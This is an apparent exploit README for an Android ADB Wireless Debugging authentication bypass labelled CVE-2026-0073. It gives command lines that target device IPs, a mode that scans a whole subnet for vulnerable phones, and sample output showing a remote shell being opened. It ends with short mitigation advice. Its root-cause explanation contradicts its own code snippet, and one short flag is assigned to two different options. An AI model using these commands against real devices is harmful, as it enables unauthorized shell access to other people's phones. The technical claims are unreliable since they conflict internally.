Share
## https://sploitus.com/exploit?id=3A682AC4-8730-5460-A9DE-44CE103E4423
# ๐ CVE-2026-0073 - Android ADB Wireless Debugging Auth Bypass
[](https://www.python.org/)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-0073)
[](LICENSE)
[](https://github.com/)
> **Zero-Click | Remote Shell | Network Scanner | Educational Security Research Tool**
---
## ๐ฏ Overview
CVE-2026-0073 is a critical authentication bypass vulnerability in Android's ADB daemon affecting **Wireless Debugging** on Android 11+ devices. The flaw resides in the TLS certificate verification logic where a type confusion in `EVP_PKEY_cmp()` allows attackers to bypass authentication by presenting an **EC P-256** or **Ed25519** certificate against a device configured with an RSA key.
This PoC demonstrates the vulnerability for **authorized security research and educational purposes only.**
---
## โจ Features
| Feature | Description |
|---------|-------------|
| ๐ **Smart Port Discovery** | Automatically scans 30000-50000 range + common ports, verifies ADB via CNXN handshake |
| ๐ **TLS 1.3 Bypass** | Exploits type confusion in `EVP_PKEY_cmp()` for authentication bypass |
| ๐จ **Dual Key Support** | EC P-256 (default) or Ed25519 certificates |
| ๐ **Interactive Shell** | Full terminal access with thread-based I/O |
| โก **Single Command Mode** | Execute one command and exit - perfect for scripting |
| ๐ก **Network Scanner** | Scan entire subnet for vulnerable devices |
| ๐ **Auto Retry** | Exponential backoff + configurable max retries |
| ๐ฏ **Manual Port Override** | Specify port when auto-discovery fails |
| ๐ **Output Capture** | Save command results to file |
| ๐จ **Colorized Output** | Professional visual feedback via colorama |
| ๐ชต **Verbose Debug** | Detailed logging for troubleshooting |
| ๐ **Proxy Support** | HTTP/HTTPS proxy compatibility |
| ๐งต **Threaded Shell** | Non-blocking interactive session |
---
## ๐ฆ Installation
๐ Usage Examples
Basic - One Shot Exploit
bash
python exploit.py --target 192.168.1.100
Interactive Shell
bash
python exploit.py -t 192.168.1.100 -i
Execute Single Command
bash
python exploit.py -t 192.168.1.100 -c "id" -o result.txt
Scan Entire Network
bash
python exploit.py --scan --interface eth0
Manual Port + Verbose
bash
python exploit.py -t 192.168.1.100 -p 39311 -v
Ed25519 Certificate
bash
python exploit.py -t 192.168.1.100 --key-type ed25519
Non-Interactive Mode (Exit After Command)
bash
python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive
โ๏ธ Command Line Arguments
Argument Short Default Description
--target -t None Target IP address
--port -p Auto Wireless Debugging port
--command -c None Execute single command
--output -o None Save output to file
--verbose -v False Enable debug logging
--interactive -i True Interactive shell mode
--no-interactive - False Exit after command execution
--scan - False Scan network for vulnerable devices
--interface -i None Network interface for scanning
--key-type - ec Certificate type (ec or ed25519)
--max-retries - 3 Maximum retry attempts
--no-auto-port - False Disable automatic port discovery
๐ง Technical Deep Dive
Vulnerability Root Cause
The vulnerability exists in adbd's TLS certificate verification:
c
// Vulnerable code in adbd_tls_verify_cert()
if (EVP_PKEY_cmp(registered_key, presented_key) == 1) {
// Authentication success
}
When EVP_PKEY_cmp() compares keys of different types (RSA vs EC), it returns -1. The code treats any non-zero return as success, causing authentication bypass.
Exploit Flow
text
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 1. ๐ PORT DISCOVERY โ
โ โโโ Scan 30000-50000 + common wireless ports โ
โ โโโ Verify ADB via CNXN handshake โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 2. ๐ TLS HANDSHAKE โ
โ โโโ Generate EC P-256 or Ed25519 certificate โ
โ โโโ Establish TLS 1.3 connection โ
โ โโโ Present certificate to device โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 3. ๐ AUTHENTICATION BYPASS โ
โ โโโ Send CNXN message โ
โ โโโ If AUTH requested โ sign token with private key โ
โ โโโ Type confusion โ device grants access โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ 4. ๐ SHELL ACCESS โ
โ โโโ Open "shell:" service โ
โ โโโ Interactive terminal OR single command โ
โ โโโ Maintain session with keep-alive โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ธ Example Output
text
$ python exploit.py --target 192.168.1.100 -v
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-0073 - Android ADB Daemon TLS Authentication Bypass Exploit โ
โ Wireless Debugging STLS Path - Zero-Click Remote Shell โ
โ CVSS 8.8 - HIGH โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[11:23:15] Attempting to discover Wireless Debugging port...
[11:23:16] Found valid Wireless Debugging port: 39311 โ
[11:23:16] Exploiting 192.168.1.100:39311 (Wireless Debugging)
[11:23:17] TLS handshake completed โ
[11:23:17] CNXN received - authentication bypass successful โ
[11:23:17] Shell opened โ
[11:23:17] Interactive shell - type 'exit' to quit
android:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),...
android:/ $
โ ๏ธ Important Notes
Item Details
Affected Versions Android 11, 12, 13, 14, 15 with Wireless Debugging enabled
Required Condition Wireless Debugging turned ON in Developer Options
Attack Surface Adjacent network (same WiFi/subnet)
Not Affected Traditional adb tcpip 5555 mode (uses different code path)
Detection Monitor TLS handshakes with EC certificates on high ports
๐ก๏ธ Mitigation
Apply Android security bulletin patches for CVE-2026-0073
Disable Wireless Debugging when not in use
Use USB debugging instead of wireless mode
Monitor network for unexpected EC certificate handshakes
git clone https://github.com/yourusername/CVE-2026-0073-Exploit.git
cd CVE-2026-0073-Exploit
pip install cryptography colorama netifaces